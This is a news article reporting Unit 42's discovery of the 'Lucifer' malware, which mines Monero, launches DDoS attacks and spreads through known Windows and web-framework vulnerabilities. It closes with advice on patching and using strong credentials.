Security researchers have discovered a new type of malware that hijacks vulnerable Windows devices to mine cryptocurrency and launch devastating DDoS attacks

The malware, dubbed "Lucifer" by its discoverers at cybersecurity firm Palo Alto Networks' Unit 42, tries common usernames and passwords at widely used system ports to "brute to infiltrate the system

This malware primarily targets corporate servers and can also infect personal computers, especially since servers can penetrate corporate networks

Unit 42 encountered this malware after investigating the CVE-2019-9081 exploit, a vulnerability in the open source web application development Laravel Framework

"Upon closer examination of this malware, which we named "Lucifer," we found that it is capable of DDoS attacks and has all kinds of exploits against vulnerable Windows hosts," Unit 42 researchers wrote in a blog post

(Lucifer's own creator calls this malware "Satan DDoS," but Unit 42 thought that might cause confusion since there is already a "Satan" ransomware)

"The first wave of the campaign stopped on June 10, 2020 The attackers then resumed the campaign on June 11, 2020, spreading an upgraded version of the malware and wreaking havoc

Researchers have described Lucifer as having "quite powerful capabilities" Once a system is infected, the perpetrator mines the Monero cryptocurrency and spreads it to other machines on the local network using the EternalBlue, EternalRomance, and DoublePulsar exploits stolen from the US National Security Agency several years ago

According to researchers, hackers use the Lucifer malware to "weaponize" various security vulnerabilities

These vulnerabilities, identified by Common Vulnerabilities and Exposures (CVE) ID numbers, include CVE-2014-6287, CVE-2018-1000861, CVE-2017-10271, ThinkPHP RCE vulnerability ( CVE-2018-20062), CVE-2018-7600, CVE-2017-9791, CVE-2019-9081, PHPStudy Backdoor RCE, CVE-2017-0144, CVE-2017-0145, and CVE-2017-8464

"These vulnerabilities are rated High or Critical because their exploitation is trivial and their impact on victims is enormous," the researchers explained [Once exploited, an attacker can execute arbitrary commands on a vulnerable device In this case, the target is Windows hosts on both the Internet and intranets, as the attacker leverages the certutil utility in the payload for malware propagation

Certutilexe is a Microsoft utility that manages digital certificates required for secure Internet communication and transactions

While these vulnerabilities are certainly worrisome, the researchers noted that patches are "readily available" and urged organizations to keep their systems updated to mitigate the attack [While the vulnerabilities exploited by this malware and the modus operandi of the attack are not novel, they are a reminder that it is critical to keep systems as up-to-date as possible, eliminate weak credentials, and have a layer of defense for assurance [Whether it is a laptop or a web server, to ensure that your Windows system is not hit by the Lucifer malware, make sure it is fully patched with the latest Windows security updates and that the system administrator's user name and password are strong and unique That's it

Of course, using the best anti-virus software also helps, most of which immediately recognize and block Lucifer and its various components